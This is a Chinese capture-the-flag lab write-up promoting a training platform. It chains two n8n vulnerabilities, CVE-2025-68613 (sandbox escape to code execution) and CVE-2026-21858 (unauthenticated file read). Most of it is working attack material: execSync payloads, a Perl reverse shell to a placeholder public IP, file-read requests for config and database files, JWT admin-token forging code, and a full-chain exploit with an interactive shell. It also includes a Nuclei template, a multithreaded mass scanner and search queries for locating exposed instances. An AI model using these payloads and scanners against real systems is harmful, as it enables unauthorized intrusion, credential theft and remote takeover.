好靶场-n8n-CVE-2026-21858+CVE-2025-68613
关注泷羽Sec和泷羽Sec-静安公众号,这里会定期更新与 OSCP、渗透测试等相关的最新文章,帮助你理解网络安全领域的最新动态。
学安全,别只看书上手练,就来好靶场,本WP靶场已开放,欢迎体验:
🔗 入口:http://www.loveli.com.cn/see_bug_one?id=581
✅ 邀请码:48ffd1d7eba24bf4
🎁 填写即领 7 天高级会员,解锁更多漏洞实战环境!快来一起实战吧!👇
因为是非常火的洞,Github上一搜就有poc
CVE-2025-68613 的进入方法
https://github.com/Threekiii/Awesome-POC/blob/master/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/n8n%20%E8%A1%A8%E8%BE%BE%E5%BC%8F%E6%B2%99%E7%AE%B1%E9%80%83%E9%80%B8%E5%AF%BC%E8%87%B4%E8%BF%9C%E7%A8%8B%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E%20CVE-2025-68613.md [[CVE-2025-68613 n8n 表达式沙箱逃逸导致远程代码执行漏洞]]
打开页面,随便注册一个账号
创建 Edit Fields(Set) 节点
创建一个新的 Workflow 并添加一个 Manual Trigger 节点,添加 Edit Fields(Set) 选项:
点击 Add Field,此处需要填写 name 和 value。name 处填入任意内容,在 value 处填入以下代码,切换到 Expression。点击 Test step 测试执行:
{{ (function(){ return this.process.mainModule.require('child_process').execSync('id').toString() })() }}
最后ls目录发现flag在/tmp目录下。
{{ (function(){ return this.process.mainModule.require('child_process').execSync('cat /tmp/flag.txt').toString() })() }}flag{93c67d9043f045b399fe6896b10395dc}
或者创建exec节点直接执行命令(注意有没有权限)
直接新建一个exec节点

想要弹回shell发现没有nc也没有python,ls /bin 发现有perl, perl也可以弹

perl -e 'use Socket;$i="公网ip";$p=4777;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
flag{c006fa82940946b1a5c261198dfba1c5}
CVE-2026-21858 的进入方法
https://github.com/Chocapikk/CVE-2026-21858
把下面的代码保存为n8n_vuln_workflow.py文件
#!/usr/bin/env python3
"""
CVE-2026-21858 漏洞工作流部署脚本
用于在已知登录凭据的n8n实例上部署易受攻击的工作流配置
"""
import requests
import json
import sys
import argparse
# 正确的漏洞工作流配置(与你提供的配置一致)
VULNERABLE_WORKFLOW = {
"name": "Vulnerable Form",
"nodes": [
{
"parameters": {
"formTitle": "Upload",
"formFields": {
"values": [
{
"fieldLabel": "document",
"fieldType": "file"
}
]
},
"responseMode": "responseNode",
"options": {}
},
"id": "trigger",
"name": "Form Trigger",
"type": "n8n-nodes-base.formTrigger",
"typeVersion": 2.2,
"position": [0, 0],
"webhookId": "vulnerable-form"
},
{
"parameters": {
"respondWith": "binary",
"options": {}
},
"id": "respond",
"name": "Respond",
"type": "n8n-nodes-base.respondToWebhook",
"typeVersion": 1.1,
"position": [300, 0]
}
],
"pinData": {},
"connections": {
"Form Trigger": {
"main": [
[
{
"node": "Respond",
"type": "main",
"index": 0
}
]
]
}
},
"active": True,
"settings": {
"executionOrder": "v1"
},
"tags": []
}
def login_n8n(base_url, email, password):
"""登录n8n并返回session"""
session = requests.Session()
print(f"[*] 正在登录 {base_url}...")
print(f" 邮箱: {email}")
try:
login_resp = session.post(
f"{base_url}/rest/login",
json={"email": email, "password": password},
timeout=15
)
if login_resp.status_code == 200:
print("[✓] 登录成功")
return session
else:
print(f"[✗] 登录失败: HTTP {login_resp.status_code}")
print(f" 响应: {login_resp.text[:200]}")
return None
except requests.exceptions.RequestException as e:
print(f"[✗] 连接失败: {e}")
return None
def check_existing_workflow(session, base_url):
"""检查是否已存在同名工作流"""
try:
resp = session.get(f"{base_url}/rest/workflows", timeout=10)
if resp.ok:
workflows = resp.json().get('data', [])
for wf in workflows:
if wf.get('name') == 'Vulnerable Form':
return wf.get('id')
return None
except:
return None
def delete_workflow(session, base_url, workflow_id):
"""删除已存在的工作流"""
try:
resp = session.delete(f"{base_url}/rest/workflows/{workflow_id}", timeout=10)
return resp.ok
except:
return False
def deploy_workflow(session, base_url):
"""部署漏洞工作流"""
# 检查是否已存在
existing_id = check_existing_workflow(session, base_url)
if existing_id:
print(f"[!] 发现已存在的 'Vulnerable Form' 工作流 (ID: {existing_id})")
print("[*] 正在删除旧工作流...")
if delete_workflow(session, base_url, existing_id):
print("[✓] 旧工作流已删除")
else:
print("[!] 删除失败,继续创建...")
print("[*] 正在创建漏洞工作流...")
try:
create_resp = session.post(
f"{base_url}/rest/workflows",
json=VULNERABLE_WORKFLOW,
timeout=15
)
if not create_resp.ok:
print(f"[✗] 创建失败: HTTP {create_resp.status_code}")
print(f" 响应: {create_resp.text[:500]}")
return None
workflow_data = create_resp.json().get('data', {})
workflow_id = workflow_data.get('id')
if not workflow_id:
print("[✗] 无法获取工作流ID")
print(f" 响应: {create_resp.text[:500]}")
return None
print(f"[✓] 工作流创建成功!")
print(f" ID: {workflow_id}")
print(f" 名称: {workflow_data.get('name')}")
# 确保工作流已激活
print("[*] 正在激活工作流...")
activate_resp = session.patch(
f"{base_url}/rest/workflows/{workflow_id}",
json={"active": True},
timeout=10
)
if activate_resp.ok:
print("[✓] 工作流已激活")
else:
print(f"[!] 激活失败: HTTP {activate_resp.status_code}")
print(" 工作流已创建但未激活,请手动激活")
return workflow_id
except requests.exceptions.RequestException as e:
print(f"[✗] 请求失败: {e}")
return None
def print_usage_instructions(base_url, workflow_id):
"""打印使用说明"""
webhook_url = f"{base_url}/form/vulnerable-form"
print("\n" + "="*70)
print("部署成功! 漏洞工作流已就绪")
print("="*70)
print(f"\n📋 工作流信息:")
print(f" 管理界面: {base_url}/workflow/{workflow_id}")
print(f" Webhook URL: {webhook_url}")
print(f"\n🔍 测试漏洞 - 读取文件:")
print(f"\n # 使用浏览器控制台:")
print(f""" fetch('{webhook_url}', {{
method: 'POST',
headers: {{'Content-Type': 'application/json'}},
body: JSON.stringify({{
data: {{}},
files: {{
test: {{
filepath: '/etc/hostname',
originalFilename: 'test.txt',
mimetype: 'text/plain',
size: 100
}}
}}
}})
}})
.then(r => r.text())
.then(console.log);""")
print(f"\n # 或使用 curl:")
print(f""" curl -X POST '{webhook_url}' \\
-H 'Content-Type: application/json' \\
-d '{{"data":{{}}, "files":{{"test":{{"filepath":"/etc/hostname","originalFilename":"test.txt","mimetype":"text/plain","size":100}}}}}}'""")
print(f"\n🎯 完整利用链:")
print(f" 1. 读取配置: /root/.n8n/config 或 /home/node/.n8n/config")
print(f" 2. 读取数据库: /root/.n8n/database.sqlite")
print(f" 3. 伪造JWT令牌")
print(f" 4. 登录管理后台")
print(f" 5. 创建RCE工作流")
print("\n" + "="*70 + "\n")
def main():
parser = argparse.ArgumentParser(
description='CVE-2026-21858 漏洞工作流部署脚本',
formatter_class=argparse.RawDescriptionHelpFormatter,
epilog="""
示例:
python3 deploy_vuln_workflow.py http://target-ip:5678 admin@exploit.local password123
python3 deploy_vuln_workflow.py https://n8n.example.com admin@example.com MyP@ssw0rd
"""
)
parser.add_argument('url', help='n8n实例URL (例: http://localhost:5678)')
parser.add_argument('email', help='管理员邮箱')
parser.add_argument('password', help='管理员密码')
args = parser.parse_args()
# 清理URL
base_url = args.url.rstrip('/')
print("="*70)
print("CVE-2026-21858 漏洞工作流部署工具")
print("="*70)
print(f"目标: {base_url}")
print(f"账号: {args.email}")
print()
# 登录
session = login_n8n(base_url, args.email, args.password)
if not session:
print("\n[✗] 部署失败: 无法登录")
sys.exit(1)
# 部署工作流
workflow_id = deploy_workflow(session, base_url)
if not workflow_id:
print("\n[✗] 部署失败: 无法创建工作流")
sys.exit(1)
# 打印使用说明
print_usage_instructions(base_url, workflow_id)
sys.exit(0)
if __name__ == "__main__":
main()然后运行,这里的模仿的是n8n的真实用户在使用过程中“不小心”的“恰好”创建了这样的一个工作流的节点。
python .\n8n_vuln_workflow.py http://target-ip:5678 111@111.com passwd这个节点是激活状态,而且是file配置。

点击 http://8vccf5j.haobachang.loveli.com.cn:8888/form/vulnerable-form 打开可以看到文件上传的显示。这一步在实际渗透过程中是不需要用户登录的,任意用户都看得到这个界面,也就是任意读取,它可以让未授权的用户读到敏感文件。实际的CVE-2026-21858利用过程是从这里开始的,现在忘了之前设置的密码吧,假装你不知道登录密码。

CVE-2025-68613 漏洞虽然可以RCE,但是前提条件是知道n8n系统的登录密码,而且这个账户还需要有节点编辑权限。也就是必须登录到下图这样节点编辑的界面才能成功执行,如果不知道账户密码,或者登录的账户没有节点编辑权限的话就没办法,只能干瞪眼。这时候CVE-2026-2185来了,这个漏洞可以在不登陆的情况下,获得系统一些敏感文件的读取权限,从而访问比如 /etc/passwd 这样的文件获得密码。从而实现完整的攻击链条。
按F12打开控制台Console输入如下内容
fetch('http://target-ip:5678/form/vulnerable-form', {
method: 'POST',
headers: {'Content-Type': 'application/json'},
body: JSON.stringify({
data: {},
files: {
test: {
filepath: '/etc/passwd',
originalFilename: 'test.txt',
mimetype: 'text/plain',
size: 100
}
}
})
})
.then(r => r.text())
.then(console.log)
确认任意文件读取漏洞存在,然后读取计算jwt所需的文件。
// 1. 读取环境变量获取HOME目录
fetch('http://target-ip:5678/form/vulnerable-form', {
method: 'POST',
headers: {'Content-Type': 'application/json'},
body: JSON.stringify({
data: {},
files: {
test: {
filepath: '/proc/self/environ',
originalFilename: 'environ.txt',
mimetype: 'text/plain',
size: 1000
}
}
})
})
.then(r => r.text())
.then(data => {
console.log('环境变量:', data);
// 从输出中找到 HOME=/home/node 或 HOME=/root
});
// 可能的配置文件路径
const configPaths = [
'/home/node/.n8n/config',
'/root/.n8n/config',
'/.n8n/config'
];
// 尝试读取配置
async function readConfig() {
for (const path of configPaths) {
try {
const response = await fetch('http://target-ip:5678/form/vulnerable-form', {
method: 'POST',
headers: {'Content-Type': 'application/json'},
body: JSON.stringify({
data: {},
files: {
config: {
filepath: path,
originalFilename: 'config.json',
mimetype: 'application/json',
size: 10000
}
}
})
});
const text = await response.text();
if (!text.includes('error') && !text.includes('could not be started')) {
console.log(`成功读取 ${path}:`, text);
return text;
}
} catch (e) {
console.log(`读取 ${path} 失败:`, e);
}
}
}
readConfig();
// 方法1: 尝试以文本形式读取(SQLite有些部分是可读文本)
fetch('http://target-ip:5678/form/vulnerable-form', {
method: 'POST',
headers: {'Content-Type': 'application/json'},
body: JSON.stringify({
data: {},
files: {
db: {
filepath: '/root/.n8n/database.sqlite',
originalFilename: 'database.txt',
mimetype: 'text/plain', // 改为text/plain
size: 500000
}
}
})
})
.then(r => r.text())
.then(data => {
console.log('数据库内容(可能是二进制+文本混合):', data);
// 尝试提取邮箱地址(通常是可读文本)
const emailMatches = data.match(/[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}/g);
console.log('找到的邮箱:', emailMatches);
// 尝试提取bcrypt密码哈希
const bcryptMatches = data.match(/\$2[aby]\$\d{2}\$[./A-Za-z0-9]{53}/g);
console.log('找到的密码哈希:', bcryptMatches);
// 尝试提取UUID(用户ID)
const uuidMatches = data.match(/[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}/gi);
console.log('找到的UUID:', uuidMatches);
});得到

环境变量: COOKIE_VALUE=b9353203-81b6-420b-b662-8c027e1627e0
成功读取 /root/.n8n/config: {
"encryptionKey": "FTOwCm2ruG3b/upNMf9yvqn0d+W8TXKW"
}
找到的邮箱: (3) ['111@111.com', '%1f0d5d68-4447-4e62-b461-57c0c751e11c111@111.com', '111@111.com']
VM84:27 找到的密码哈希: ['$2a$10$Xim.XqxLEYGpP7JIAwIkouq4PYcG1DE5IqEFlxPjCXQJoAdmsHkt6']
VM84:31 找到的UUID: (7) ['89f3a667-194f-455c-a277-b30c9bc612d0', '717686a5-c248-45d7-ad21-f6f4a9ed2f38', '1f0d5d68-4447-4e62-b461-57c0c751e11c', '1f0d5d68-4447-4e62-b461-57c0c751e11c', '1f0d5d68-4447-4e62-b461-57c0c751e11c', '1f0d5d68-4447-4e62-b461-57c0c751e11c', '1f0d5d68-4447-4e62-b461-57c0c751e11c']提取到的关键信息
encryptionKey: FTOwCm2ruG3b/upNMf9yvqn0d+W8TXKW
userId: 1f0d5d68-4447-4e62-b461-57c0c751e11c (出现5次,明显是管理员)
email: 111@111.com
passwordHash: $2a$10$Xim.XqxLEYGpP7JIAwIkouq4PYcG1DE5IqEFlxPjCXQJoAdmsHkt6方法一:使用浏览器完成JWT伪造(纯手动)
在浏览器控制台运行以下代码:
// 第1步:加载crypto-js库
const script = document.createElement('script');
script.src = 'https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.js';
document.head.appendChild(script);
// 第2步:等待3秒后运行JWT生成代码
setTimeout(() => {
// 已知信息
const encryptionKey = "FTOwCm2ruG3b/upNMf9yvqn0d+W8TXKW";
const userId = "1f0d5d68-4447-4e62-b461-57c0c751e11c";
const email = "111@111.com";
const passwordHash = "$2a$10$Xim.XqxLEYGpP7JIAwIkouq4PYcG1DE5IqEFlxPjCXQJoAdmsHkt6";
// 派生JWT secret(取偶数位字符)
let extracted = '';
for (let i = 0; i < encryptionKey.length; i += 2) {
extracted += encryptionKey[i];
}
const jwtSecret = CryptoJS.SHA256(extracted).toString();
console.log('🔑 JWT Secret:', jwtSecret);
// 计算JWT hash
const combined = email + ':' + passwordHash;
const sha256Hash = CryptoJS.SHA256(combined);
const base64Hash = sha256Hash.toString(CryptoJS.enc.Base64);
const jwtHash = base64Hash.substring(0, 10);
console.log('🔐 JWT Hash:', jwtHash);
// 构造JWT Header和Payload
const header = {alg: "HS256", typ: "JWT"};
const payload = {id: userId, hash: jwtHash};
// Base64URL编码
const base64urlEncode = (obj) => {
return btoa(JSON.stringify(obj))
.replace(/\+/g, '-')
.replace(/\//g, '_')
.replace(/=/g, '');
};
const headerB64 = base64urlEncode(header);
const payloadB64 = base64urlEncode(payload);
// 计算签名
const message = headerB64 + '.' + payloadB64;
const signature = CryptoJS.HmacSHA256(message, jwtSecret)
.toString(CryptoJS.enc.Base64)
.replace(/\+/g, '-')
.replace(/\//g, '_')
.replace(/=/g, '');
// 完整JWT
const token = message + '.' + signature;
console.log('✅ JWT Token:', token);
// 设置Cookie,IP改成靶机的IP
document.cookie = `n8n-auth=${token}; path=/; domain=target-ip`;
console.log('🍪 Cookie已设置!');
console.log('📍 现在访问: http://target-ip:5678/');
// 自动跳转
setTimeout(() => {
window.location.href = 'http://target-ip:5678/';
}, 1000);
}, 3000);自动跳转,直接就进来了,不用输入密码登录。然后就可以用之前CVE-2025-68613的方法了。
脚本化利用
一键全自动脚本exploit.py
#!/usr/bin/env python3
"""
CVE-2026-21858 + CVE-2025-68613 - n8n Full Chain Exploit
Arbitrary File Read → Admin Token Forge → Sandbox Bypass → RCE
Author: Chocapikk
GitHub: https://github.com/Chocapikk/CVE-2026-21858
"""
import argparse
import hashlib
import json
import secrets
import sqlite3
import string
import tempfile
from base64 import b64encode
import jwt
import requests
from pwn import log
BANNER = """
╔═══════════════════════════════════════════════════════════════╗
║ CVE-2026-21858 + CVE-2025-68613 - n8n Full Chain ║
║ Arbitrary File Read → Token Forge → Sandbox Bypass → RCE ║
║ ║
║ by Chocapikk ║
╚═══════════════════════════════════════════════════════════════╝
"""
RCE_PAYLOAD = '={{ (function() { var require = this.process.mainModule.require; var execSync = require("child_process").execSync; return execSync("CMD").toString(); })() }}'
def randstr(n: int = 12) -> str:
return "".join(secrets.choice(string.ascii_lowercase + string.digits) for _ in range(n))
def randpos() -> list[int]:
return [secrets.randbelow(500) + 100, secrets.randbelow(500) + 100]
class Ni8mare:
def __init__(self, base_url: str, form_path: str):
self.base_url = base_url.rstrip("/")
self.form_url = f"{self.base_url}/{form_path.lstrip('/')}"
self.session = requests.Session()
self.admin_token = None
def _api(self, method: str, path: str, **kwargs) -> requests.Response | None:
kwargs.setdefault("timeout", 30)
kwargs.setdefault("cookies", {"n8n-auth": self.admin_token} if self.admin_token else {})
resp = self.session.request(method, f"{self.base_url}{path}", **kwargs)
return resp if resp.ok else None
def _lfi_payload(self, filepath: str) -> dict:
return {
"data": {},
"files": {
f"f-{randstr(6)}": {
"filepath": filepath,
"originalFilename": f"{randstr(8)}.bin",
"mimetype": "application/octet-stream",
"size": secrets.randbelow(90000) + 10000
}
}
}
def _build_nodes(self, command: str) -> tuple[list, dict, str, str]:
trigger_name, rce_name = f"T-{randstr(8)}", f"R-{randstr(8)}"
result_var = f"v{randstr(6)}"
payload_value = RCE_PAYLOAD.replace("CMD", command.replace('"', '\\"'))
nodes = [
{"parameters": {}, "name": trigger_name, "type": "n8n-nodes-base.manualTrigger",
"typeVersion": 1, "position": randpos(), "id": f"t-{randstr(12)}"},
{"parameters": {"values": {"string": [{"name": result_var, "value": payload_value}]}},
"name": rce_name, "type": "n8n-nodes-base.set", "typeVersion": 2,
"position": randpos(), "id": f"r-{randstr(12)}"}
]
connections = {trigger_name: {"main": [[{"node": rce_name, "type": "main", "index": 0}]]}}
return nodes, connections, trigger_name, rce_name
# ========== Arbitrary File Read (CVE-2026-21858) ==========
def read_file(self, filepath: str, timeout: int = 30) -> bytes | None:
resp = self.session.post(
self.form_url, json=self._lfi_payload(filepath),
headers={"Content-Type": "application/json"}, timeout=timeout
)
return resp.content if resp.ok and resp.content else None
def get_version(self) -> tuple[str, bool]:
resp = self._api("GET", "/rest/settings", timeout=10)
version = resp.json().get("data", {}).get("versionCli", "0.0.0") if resp else "0.0.0"
major, minor = map(int, version.split(".")[:2])
return version, major < 1 or (major == 1 and minor < 121)
def get_home(self) -> str | None:
data = self.read_file("/proc/self/environ")
if not data:
return None
for var in data.split(b"\x00"):
if var.startswith(b"HOME="):
return var.decode().split("=", 1)[1]
return None
def get_key(self, home: str) -> str | None:
data = self.read_file(f"{home}/.n8n/config")
return json.loads(data).get("encryptionKey") if data else None
def get_db(self, home: str) -> bytes | None:
return self.read_file(f"{home}/.n8n/database.sqlite", timeout=120)
def extract_admin(self, db: bytes) -> tuple[str, str, str] | None:
with tempfile.NamedTemporaryFile(suffix=".db") as f:
f.write(db)
f.flush()
conn = sqlite3.connect(f.name)
row = conn.execute("SELECT id, email, password FROM user WHERE role='global:owner' LIMIT 1").fetchone()
conn.close()
return (row[0], row[1], row[2]) if row else None
def forge_token(self, key: str, uid: str, email: str, pw_hash: str) -> str:
secret = hashlib.sha256(key[::2].encode()).hexdigest()
h = b64encode(hashlib.sha256(f"{email}:{pw_hash}".encode()).digest()).decode()[:10]
self.admin_token = jwt.encode({"id": uid, "hash": h}, secret, "HS256")
return self.admin_token
def verify_token(self) -> bool:
return self._api("GET", "/rest/users", timeout=10) is not None
# ========== RCE (CVE-2025-68613) ==========
def rce(self, command: str) -> str | None:
nodes, connections, _, _ = self._build_nodes(command)
wf_name = f"wf-{randstr(16)}"
workflow = {"name": wf_name, "active": False, "nodes": nodes,
"connections": connections, "settings": {}}
resp = self._api("POST", "/rest/workflows", json=workflow, timeout=10)
if not resp:
return None
wf_id = resp.json().get("data", {}).get("id")
if not wf_id:
return None
run_data = {"workflowData": {"id": wf_id, "name": wf_name, "active": False,
"nodes": nodes, "connections": connections, "settings": {}}}
resp = self._api("POST", f"/rest/workflows/{wf_id}/run", json=run_data, timeout=30)
if not resp:
self._api("DELETE", f"/rest/workflows/{wf_id}", timeout=5)
return None
exec_id = resp.json().get("data", {}).get("executionId")
result = self._get_result(exec_id) if exec_id else None
self._api("DELETE", f"/rest/workflows/{wf_id}", timeout=5)
return result
def _get_result(self, exec_id: str) -> str | None:
resp = self._api("GET", f"/rest/executions/{exec_id}", timeout=10)
if not resp:
return None
data = resp.json().get("data", {}).get("data")
if not data:
return None
parsed = json.loads(data)
# Result is usually the last non-empty string
for item in reversed(parsed):
if isinstance(item, str) and len(item) > 3 and item not in ("success", "error"):
return item.strip()
return None
# ========== Full Chain ==========
def pwn(self) -> bool:
p = log.progress("HOME directory")
home = self.get_home()
if not home:
return p.failure("Not found") or False
p.success(home)
p = log.progress("Encryption key")
key = self.get_key(home)
if not key:
return p.failure("Failed") or False
p.success(f"{key[:8]}...")
p = log.progress("Database")
db = self.get_db(home)
if not db:
return p.failure("Failed") or False
p.success(f"{len(db)} bytes")
p = log.progress("Admin user")
admin = self.extract_admin(db)
if not admin:
return p.failure("Not found") or False
uid, email, pw = admin
p.success(email)
p = log.progress("Token forge")
self.forge_token(key, uid, email, pw)
p.success("OK")
p = log.progress("Admin access")
if not self.verify_token():
return p.failure("Rejected") or False
p.success("GRANTED!")
log.success(f"Cookie: n8n-auth={self.admin_token}")
return True
def parse_args():
p = argparse.ArgumentParser(description="n8n Ni8mare - Full Chain Exploit")
p.add_argument("url", help="Target URL (http://target:5678)")
p.add_argument("form", help="Form path (/form/upload)")
p.add_argument("--read", metavar="PATH", help="Read arbitrary file")
p.add_argument("--cmd", metavar="CMD", help="Execute single command")
p.add_argument("-o", "--output", metavar="FILE", help="Save LFI output to file")
return p.parse_args()
def run_read(exploit: Ni8mare, path: str, output: str | None) -> None:
data = exploit.read_file(path)
if not data:
log.error("File read failed")
return
log.success(f"{len(data)} bytes")
if output:
with open(output, "wb") as f:
f.write(data)
log.success(f"Saved: {output}")
return
print(data.decode())
def run_cmd(exploit: Ni8mare, cmd: str) -> None:
p = log.progress("RCE")
out = exploit.rce(cmd)
if not out:
p.failure("Failed")
return
p.success("OK")
print(f"\n{out}")
def run_shell(exploit: Ni8mare) -> None:
log.info("Interactive mode (type 'exit' to quit)")
while True:
try:
cmd = input("\033[91mn8n\033[0m> ").strip()
except (EOFError, KeyboardInterrupt):
print()
return
if not cmd or cmd == "exit":
return
out = exploit.rce(cmd)
if out:
print(out)
def main():
print(BANNER)
args = parse_args()
exploit = Ni8mare(args.url, args.form)
version, vuln = exploit.get_version()
log.info(f"Target: {exploit.form_url}")
log.info(f"Version: {version} ({'VULN' if vuln else 'SAFE'})")
if args.read:
run_read(exploit, args.read, args.output)
return
if not exploit.pwn():
return
if args.cmd:
run_cmd(exploit, args.cmd)
return
run_shell(exploit)
if __name__ == "__main__":
main()

flag{3b0788b1fb424583ad8bdebd080fd843}
搜索语法
n8n 平台远程代码执行漏洞(CVE-2025-68613)ZoomEye搜索app=“n8n” https://www.zoomeye.org/searchResult?q=YXBwPSJuOG4i hunter搜索语法
web.icon=="8ad475e8b10ff8bcff648ae6d49c88ae"
web.icon="8ad475e8b10ff8bcff648ae6d49c88ae"&&icp.number!==""&&icp.name!="公司"&&icp.name!="工作室"&&icp.type!="个人"Nuclei模板
id: CVE-2026-21858-lfi-fixed
info:
name: n8n Arbitrary File Read (CVE-2026-21858) - Active Check
author: customized
severity: critical
description: |
Proves CVE-2026-21858 by reading /etc/passwd via n8n vulnerable form trigger.
tags: cve,cve2026,n8n,lfi
requests:
- method: POST
path:
- "{{BaseURL}}/form/vulnerable-form"
- "{{BaseURL}}/webhook/vulnerable-form"
- "{{BaseURL}}/form/upload"
- "{{BaseURL}}/webhook/upload"
# 如果你知道其他特定路径,可以在这里添加
headers:
Content-Type: "application/json"
# 这里的 JSON 必须是压缩的一行,严格模仿 Python 脚本的 Payload
body: '{"data":{},"files":{"check_vuln":{"filepath":"/etc/passwd","originalFilename":"check.bin","mimetype":"application/octet-stream","size":1024}}}'
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- "root:.*:0:0:"
- type: status
status:
- 200把上面的代码保存为CVE-2026-21858-lfi.yaml文件,然后执行如下命令。
nuclei -u http://8vccf5j.haobachang.loveli.com.cn:8888/ -t CVE-2026-21858-lfi.yaml
批量测试脚本
scan_n8n.py内容如下
#!/usr/bin/env python3
import requests
import argparse
import urllib3
import concurrent.futures
from urllib.parse import urljoin
import sys
# 禁用 SSL 警告
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
# 颜色代码
GREEN = "\033[92m"
RED = "\033[91m"
YELLOW = "\033[93m"
RESET = "\033[0m"
def get_lfi_payload(filepath="/etc/passwd"):
"""构造恶意 JSON Payload"""
return {
"data": {},
"files": {
"check_vuln": {
"filepath": filepath,
"originalFilename": "test.bin",
"mimetype": "application/octet-stream",
"size": 1024
}
}
}
def check_vulnerability(target_url, form_path):
"""检测单个目标"""
# 确保 URL 格式正确
if not target_url.startswith("http"):
target_url = f"http://{target_url}"
full_url = urljoin(target_url, form_path)
try:
# 发送 LFI 请求
response = requests.post(
full_url,
json=get_lfi_payload(),
headers={"Content-Type": "application/json"},
timeout=10,
verify=False
)
# 检查 /etc/passwd 的特征字符
if response.status_code == 200 and "root:x:0:0" in response.text:
print(f"[{GREEN}VULN{RESET}] {full_url} - Successfully read /etc/passwd")
return full_url
elif response.status_code == 404:
# 这里的 404 可能意味着 Form ID 不对,而不是 n8n 不存在
print(f"[{YELLOW}WARN{RESET}] {full_url} - Form endpoint not found (404)")
else:
print(f"[{RED}FAIL{RESET}] {full_url} - Not vulnerable or unknown response (Code: {response.status_code})")
except requests.exceptions.RequestException as e:
print(f"[{RED}ERR {RESET}] {target_url} - Connection failed: {str(e)[:50]}")
return None
def main():
parser = argparse.ArgumentParser(description="Batch Scanner for CVE-2026-21858 (n8n LFI)")
parser.add_argument("-f", "--file", help="File containing list of target URLs", required=True)
parser.add_argument("-p", "--path", help="Form path to test (default: /form/vulnerable-form)", default="/form/vulnerable-form")
parser.add_argument("-t", "--threads", help="Number of threads", type=int, default=10)
parser.add_argument("-o", "--output", help="File to save vulnerable URLs", default="vuln_hosts.txt")
args = parser.parse_args()
targets = []
try:
with open(args.file, "r") as f:
targets = [line.strip() for line in f if line.strip()]
except FileNotFoundError:
print(f"Error: File {args.file} not found.")
sys.exit(1)
print(f"[*] Loaded {len(targets)} targets.")
print(f"[*] Testing Form Path: {args.path}")
print("[*] Starting scan...\n")
vulnerable_hosts = []
# 多线程扫描
with concurrent.futures.ThreadPoolExecutor(max_workers=args.threads) as executor:
futures = {executor.submit(check_vulnerability, url, args.path): url for url in targets}
for future in concurrent.futures.as_completed(futures):
result = future.result()
if result:
vulnerable_hosts.append(result)
# 保存结果
if vulnerable_hosts:
with open(args.output, "w") as f:
for url in vulnerable_hosts:
f.write(url + "\n")
print(f"\n[{GREEN}SUCCESS{RESET}] Found {len(vulnerable_hosts)} vulnerable hosts. Saved to {args.output}")
else:
print(f"\n[{RED}FINISHED{RESET}] No vulnerable hosts found.")
if __name__ == "__main__":
main()准备一个 target.txt,每行一个 http://ip:port。
python .\scan_n8n.py -f .\target.txt -t 20
🔗 参考资源
官方公告
https://www.cve.org/CVERecord?id=CVE-2025-68613 https://www.cve.org/CVERecord?id=CVE-2026-21858
技术分析
- https://github.com/n8n-io/n8n/commit/08f332015153decdda3c37ad4fcb9f7ba13a7c79
- https://github.com/n8n-io/n8n/commit/1c933358acef527ff61466e53268b41a04be1000
- https://github.com/n8n-io/n8n/commit/39a2d1d60edde89674ca96dcbb3eb076ffff6316
- https://github.com/n8n-io/n8n/security/advisories/GHSA-v98v-ff95-f3cp
- Cyera Research - Ni8mare Full Write-up - Original research by Dor Attias
- GHSA-v4pr-fm98-w9pg - CVE-2026-21858
- GHSA-v98v-ff95-f3cp - CVE-2025-68613
- Nuclei Template CVE-2025-68613
- LeakIX Search Results - Exposed vulnerable instances
- Formidable - “The library, not the song” (thanks Cyera for the laugh)
PoC/Exploit
n8n 表达式沙箱逃逸导致远程代码执行漏洞 CVE-2025-68613 CVE-2026-21858 + CVE-2025-68613 - n8n Full Chain
🔔 想要获取更多网络安全与编程技术干货?
关注 泷羽Sec-静安 公众号,与你一起探索前沿技术,分享实用的学习资源与工具。我们专注于深入分析,拒绝浮躁,只做最实用的技术分享!💻
马上加入我们,共同成长!🌟
👉 长按或扫描二维码关注公众号
直接回复文章中的关键词,获取更多技术资料与书单推荐!📚